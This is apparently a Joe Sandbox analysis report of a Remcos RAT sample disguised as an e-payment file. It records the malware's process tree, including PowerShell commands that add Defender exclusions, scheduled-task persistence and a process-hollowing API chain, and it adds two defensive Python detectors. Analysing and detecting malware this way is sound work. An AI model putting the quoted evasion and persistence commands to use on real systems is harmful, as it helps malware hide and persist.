                            TLSH:02F4F161B20A8B99D51E0BF90CA54544037A5F1F3220D31E2ECD3AEBB1B3747A646D7B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..............0.................. ........@.. ....................... ............@................................
                            Icon Hash:0fd88dc89ea7861b
                            Entrypoint:0x4ad3a2
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66821938 [Mon Jul 1 02:49:28 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad350 | 0x4f | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x10ca0 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x2000 | 0xab3a8 | 0xab400 | 577bb28e10d16b3fff11359fa446c5c6 | False | 0.7950544593978102 | data | 7.914356657903147 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc | 0xae000 | 0x10ca0 | 0x10e00 | 6a7f49bbdd3a3cd8bb010aba57da5883 | False | 0.1489872685185185 | data | 3.86611313725418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0xc0000 | 0xc | 0x200 | a0972416a8e5d11832db831cdf2b1ffb | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_ICON | 0xae118 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | | | 0.14468236129184905
                            RT_GROUP_ICON | 0xbe940 | 0x14 | data | | | 1.0
                            RT_GROUP_ICON | 0xbe954 | 0x14 | data | | | 1.05
                            RT_VERSION | 0xbe968 | 0x338 | data | | | 0.4381067961165049
                            DLL | Import
                            mscoree.dll | _CorExeMain


                            Target ID:0
                            Start time:09:13:47
                            Start date:01/07/2024
                            Path:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0x40000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0x670000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
                            Imagebase:0x670000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
                            Imagebase:0x9f0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:09:13:49
                            Start date:01/07/2024
                            Path:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0xe20000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Target ID:9
                            Start time:09:13:50
                            Start date:01/07/2024
                            Path:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Imagebase:0x4c0000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 42%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:10
                            Start time:09:13:50
                            Start date:01/07/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff72d8c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
                            Imagebase:0x9f0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
                            Imagebase:0x470000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low
                            Has exited:true
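
Target ID 11 above registers a scheduled task from an XML file in the user's Temp directory, a persistence pattern worth alerting on regardless of the task name. The Python below is an added example (not Joe Sandbox's or the malware author's code) of a process-creation-event check for that pattern. It goes beyond what this report shows in two ways: it also flags a task action (/TR) that points at a user-writable path, and a schtasks.exe spawned by a binary living in such a path. The events are constructed; the first command line is the one recorded for Target ID 11, while its parent image and the three other events are assumptions made for the example.

```python
"""Flag schtasks.exe invocations that register a task from a temp-directory XML
or whose action or parent lives in a user-writable path.
Added example; not Joe Sandbox code."""
import re
from typing import Dict, List

# Tokeniser for Windows command lines: keeps "quoted strings" as one token.
_TOKEN = re.compile(r'"[^"]*"|\S+')
# Assumption: a default Windows directory layout.
_TEMP_DIR = re.compile(r'\\(AppData\\Local\\Temp|Windows\\Temp)\\', re.IGNORECASE)
_USER_WRITABLE = re.compile(r'\\(AppData\\(Roaming|Local)|Users\\Public)\\', re.IGNORECASE)


def parse_args(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, stripping surrounding quotes."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def option_value(args: List[str], name: str) -> str:
    """Return the value following option `name` (e.g. '/XML'), or '' if absent."""
    lowered = [a.lower() for a in args]
    if name.lower() in lowered:
        idx = lowered.index(name.lower())
        if idx + 1 < len(args):
            return args[idx + 1]
    return ''


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event looks like schtasks persistence."""
    reasons: List[str] = []
    if not event.get('image', '').lower().endswith('\\schtasks.exe'):
        return reasons
    args = parse_args(event.get('cmdline', ''))
    flags = {a.lower() for a in args if a.startswith('/')}
    if '/create' not in flags:
        return reasons  # /Query, /Delete etc. are not persistence
    xml_path = option_value(args, '/XML')
    if xml_path and _TEMP_DIR.search(xml_path):
        reasons.append(f'task definition loaded from temp XML: {xml_path}')
    action = option_value(args, '/TR')
    if action and _USER_WRITABLE.search(action):
        reasons.append(f'task action runs from user-writable path: {action}')
    parent = event.get('parent_image', '')
    if parent and _USER_WRITABLE.search(parent):
        reasons.append(f'schtasks spawned by binary in user-writable path: {parent}')
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Evaluate every event; return only those with at least one reason."""
    hits = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            hits.append({'pid': ev.get('pid'), 'reasons': reasons})
    return hits


# Constructed sample events. The first command line is the one the report records
# for Target ID 11; its parent image and the other three events are assumptions.
SAMPLE_EVENTS = [
    {'pid': '11', 'image': r'C:\Windows\SysWOW64\schtasks.exe',
     'parent_image': r'C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe',
     'cmdline': r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"'},
    {'pid': '200', 'image': r'C:\Windows\System32\schtasks.exe',
     'parent_image': r'C:\Windows\System32\cmd.exe',
     'cmdline': r'schtasks.exe /Query /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan"'},
    {'pid': '201', 'image': r'C:\Windows\System32\schtasks.exe',
     'parent_image': r'C:\Program Files\Vendor\setup.exe',
     'cmdline': r'schtasks.exe /Create /TN "Vendor\Agent" /XML "C:\Program Files\Vendor\agent.xml"'},
    {'pid': '202', 'image': r'C:\Windows\System32\schtasks.exe',
     'parent_image': r'C:\Windows\System32\cmd.exe',
     'cmdline': r'schtasks /Create /SC MINUTE /MO 1 /TN "Updater" /TR "C:\Users\user\AppData\Roaming\x.exe"'},
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_EVENTS):
        print(hit['pid'], '->', '; '.join(hit['reasons']))
```

The /XML path check is the high-signal part: legitimate installers normally register tasks from their own install directory, not from a freshly written file in Temp. The parent-path and /TR checks are noisier and are better used to raise severity than as stand-alone alerts.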


                              Execution Graph

                              Execution Coverage:12.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:184
                              Total number of Limit Nodes:9
execution_graph (node and edge listing rendered by the interactive graph viewer; not reproduced). Recoverable content: in the 00650000 region the nodes reach GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, LoadLibraryExW, DuplicateHandle and CreateActCtxA; in the 023C0000 region a single caller at 023C4B90 dispatches to wrappers around CreateProcessA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, and a separate path (023C5DA0 → 023C1910 → 023C6020) reaches PostMessageW.
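
The 023C0000 region of the execution graph chains CreateProcessA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread from one caller. That is the API chain used by process-hollowing (RunPE) loaders: start a host process suspended, overwrite its image with the payload, point the primary thread's context at the new entry point, resume. The Python below is an added example (not Joe Sandbox code) of a detector that reconstructs that chain per child process from an API trace. The trace record layout (api/args/out dictionaries keyed by handle) is an assumption, not a Joe Sandbox format; the sample trace is constructed to mirror the API set seen in this report, the host image paths and addresses are placeholders, and whether CreateProcessA was really called with CREATE_SUSPENDED is not visible in the graph, so the sample assumes it.

```python
"""Reconstruct the process-hollowing API chain per child process from an API
trace. Added example; the trace record layout is an assumption, not a Joe
Sandbox format."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit, winbase.h

# Stages that must all occur, in this order, for a hollowing verdict.
STAGES = ('create_suspended', 'write_memory', 'set_thread_context', 'resume_thread')


@dataclass
class Target:
    """What the traced process has done to one child it created."""
    pid: Optional[int]
    image: str
    stages: List[str] = field(default_factory=list)  # in observed order
    bytes_written: int = 0

    def reached(self, stage: str) -> None:
        if stage not in self.stages:
            self.stages.append(stage)

    def is_hollowed(self) -> bool:
        """True only if every required stage occurred, in the required order."""
        return [s for s in self.stages if s in STAGES] == list(STAGES)


def analyze(trace: List[dict]) -> Dict[int, Target]:
    """Walk the trace once; return targets keyed by the child's process handle."""
    targets: Dict[int, Target] = {}
    thread_owner: Dict[int, int] = {}  # hThread -> hProcess of the same child
    for call in trace:
        api, args, out = call['api'], call.get('args', {}), call.get('out', {})
        if api in ('CreateProcessA', 'CreateProcessW'):
            target = Target(out.get('dwProcessId'),
                            args.get('lpApplicationName') or args.get('lpCommandLine', ''))
            if args.get('dwCreationFlags', 0) & CREATE_SUSPENDED:
                target.reached('create_suspended')
            targets[out['hProcess']] = target
            thread_owner[out['hThread']] = out['hProcess']
        elif api in ('ReadProcessMemory', 'VirtualAllocEx', 'WriteProcessMemory'):
            target = targets.get(args.get('hProcess'))
            if target is None:
                continue  # handle to a process we did not see created; out of scope
            if api == 'WriteProcessMemory':
                target.bytes_written += args.get('nSize', 0)
                target.reached('write_memory')
            else:
                target.reached('read_memory' if api == 'ReadProcessMemory' else 'alloc_memory')
        elif api in ('SetThreadContext', 'Wow64SetThreadContext', 'ResumeThread'):
            hproc = thread_owner.get(args.get('hThread'))
            if hproc in targets:
                targets[hproc].reached('resume_thread' if api == 'ResumeThread'
                                       else 'set_thread_context')
    return targets


def hollowed(trace: List[dict]) -> List[Target]:
    """Children for which the full chain was observed."""
    return [t for t in analyze(trace).values() if t.is_hollowed()]


# Constructed sample trace: one full hollowing chain mirroring the API set in the
# execution graph, one normally started child, one partial chain. Handles,
# addresses and image paths are placeholders.
SAMPLE_TRACE = [
    {'api': 'CreateProcessA',
     'args': {'lpApplicationName': r'C:\placeholder\host.exe', 'dwCreationFlags': 0x4},
     'out': {'hProcess': 0x1a4, 'hThread': 0x1a8, 'dwProcessId': 4120}},
    {'api': 'ReadProcessMemory', 'args': {'hProcess': 0x1a4, 'lpBaseAddress': 0x7ffde008, 'nSize': 4}},
    {'api': 'VirtualAllocEx', 'args': {'hProcess': 0x1a4, 'lpAddress': 0x400000, 'dwSize': 0x6c000}},
    {'api': 'WriteProcessMemory', 'args': {'hProcess': 0x1a4, 'lpBaseAddress': 0x400000, 'nSize': 0x400}},
    {'api': 'WriteProcessMemory', 'args': {'hProcess': 0x1a4, 'lpBaseAddress': 0x401000, 'nSize': 0x5a000}},
    {'api': 'WriteProcessMemory', 'args': {'hProcess': 0x1a4, 'lpBaseAddress': 0x7ffde008, 'nSize': 4}},
    {'api': 'Wow64SetThreadContext', 'args': {'hThread': 0x1a8}},
    {'api': 'ResumeThread', 'args': {'hThread': 0x1a8}},
    {'api': 'CreateProcessA',
     'args': {'lpApplicationName': r'C:\Windows\System32\notepad.exe', 'dwCreationFlags': 0x0},
     'out': {'hProcess': 0x1b0, 'hThread': 0x1b4, 'dwProcessId': 4200}},
    {'api': 'CreateProcessA',
     'args': {'lpApplicationName': r'C:\placeholder\host2.exe', 'dwCreationFlags': 0x4},
     'out': {'hProcess': 0x1c0, 'hThread': 0x1c4, 'dwProcessId': 4300}},
    {'api': 'WriteProcessMemory', 'args': {'hProcess': 0x1c0, 'lpBaseAddress': 0x400000, 'nSize': 0x100}},
    {'api': 'ResumeThread', 'args': {'hThread': 0x1c4}},
]

if __name__ == '__main__':
    for t in hollowed(SAMPLE_TRACE):
        print(f'hollowed pid={t.pid} image={t.image} bytes_written={t.bytes_written}')
```

Keying state on raw handle values is adequate for a short trace but not for a long one: once the injector calls CloseHandle, the same value can be reused for an unrelated object, so a production detector should retire a target on CloseHandle and re-key on the handle's open/close epoch.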
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8c3105e406fd2b427afbdae5d6a42ae17e1d1224e8693adc2e0415052c51a55
                              • Instruction ID: 45e6f00900ebf393e4f9f3d0db5ccfda54e3efdb90200558a9ed07a24a477839
                              • Opcode Fuzzy Hash: c8c3105e406fd2b427afbdae5d6a42ae17e1d1224e8693adc2e0415052c51a55
                              • Instruction Fuzzy Hash: CBE198717012048BEB29DBB5C450BAEB7FBAFC8704F20856EE5469B291CB35EC46CB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8aed1c84e18fd8eb630e367760ee1aa05a9fd9d710243a578cb5bc940339a209
                              • Instruction ID: c1d19028c73162519f31810c53cc5649f30483330532a6efadb2229828cda426
                              • Opcode Fuzzy Hash: 8aed1c84e18fd8eb630e367760ee1aa05a9fd9d710243a578cb5bc940339a209
                              • Instruction Fuzzy Hash: F0A0016485D24886C1112E22A8984B5E67C968F142F627549915F728435A78D8048B98

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0065D0BE
                              • GetCurrentThread.KERNEL32 ref: 0065D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0065D138
                              • GetCurrentThreadId.KERNEL32 ref: 0065D191
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 64850339e72cb9aed82c10dd4a672196c7721bf6a77ef354f78057f9b4ca2c0d
                              • Instruction ID: 91d95ce723eb8473dbc6da8a04a36dcce2df5644d88f7be41836e68e1356bc3e
                              • Opcode Fuzzy Hash: 64850339e72cb9aed82c10dd4a672196c7721bf6a77ef354f78057f9b4ca2c0d
                              • Instruction Fuzzy Hash: D25154B09006498FEB25DFAAD548BEEBBF2FF88314F20845AE409A7390C7745944CF65

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0065D0BE
                              • GetCurrentThread.KERNEL32 ref: 0065D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0065D138
                              • GetCurrentThreadId.KERNEL32 ref: 0065D191
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: bbf346684dce369a6086efe3ec5e34e0df409649c1d68ad8a74f27f675fd49f8
                              • Instruction ID: 0d9b11f7e381fb82b416a2b1420e819afaacc0028d3ed13b53ceefde150701ca
                              • Opcode Fuzzy Hash: bbf346684dce369a6086efe3ec5e34e0df409649c1d68ad8a74f27f675fd49f8
                              • Instruction Fuzzy Hash: 755144B09006098FEB25DFAAD548BEEBBF1FF48314F20845AE419A7390D774A944CF65

                              Control-flow Graph

control_flow_graph for the function at 023C1BFD (basic blocks 023C1BFD-023C1F4D; the only API call is CreateProcessA in block 023C1D97-023C1E51). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C1E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 154ff13d2909b99cddb426a5405db899098678eb00a8be46248fbc147fe45933
                              • Instruction ID: df03511f3309eddcabc0767680ced44cff8c0ffdd317084a355a5843572f269d
                              • Opcode Fuzzy Hash: 154ff13d2909b99cddb426a5405db899098678eb00a8be46248fbc147fe45933
                              • Instruction Fuzzy Hash: 7AA16A71D003198FEB14DF68C8417EEBBB2BF48314F2481AAE859A7281DB749985DF91

                              Control-flow Graph

control_flow_graph for the function at 023C1C08 (basic blocks 023C1C08-023C1F4D; the only API call is CreateProcessA in block 023C1D97-023C1E51). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C1E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: a5caf2e2457d950e738e4c5a90fbbd910d75d31b20df85931f4efff28c86437c
                              • Instruction ID: 4aee186c2b595a8f82aa2f1923a359d7c8e941c78340ad248801042c1c8e6362
                              • Opcode Fuzzy Hash: a5caf2e2457d950e738e4c5a90fbbd910d75d31b20df85931f4efff28c86437c
                              • Instruction Fuzzy Hash: B0916A71D003198FEB14DF69C8407EEBBB2BF44314F2481AAE848A7281DB749985DF91

                              Control-flow Graph

control_flow_graph for the function at 0065ADA8 (basic blocks 0065ADA8-0065B028; GetModuleHandleW in block 0065AFE0-0065B00B, plus internal calls to 0065A0CC, 0065A0D8, 0065A0E8, 0065A0F8, 0065A108, 0065B031 and 0065B040). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0065AFFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 6d52aac03182733e74789c9c2570f51c66631e47f6b21b7b57b00d0ef4b983f6
                              • Instruction ID: 2f14a93d320ae660e08e970fd96260da173ef3b345e3babf5831c83117c41238
                              • Opcode Fuzzy Hash: 6d52aac03182733e74789c9c2570f51c66631e47f6b21b7b57b00d0ef4b983f6
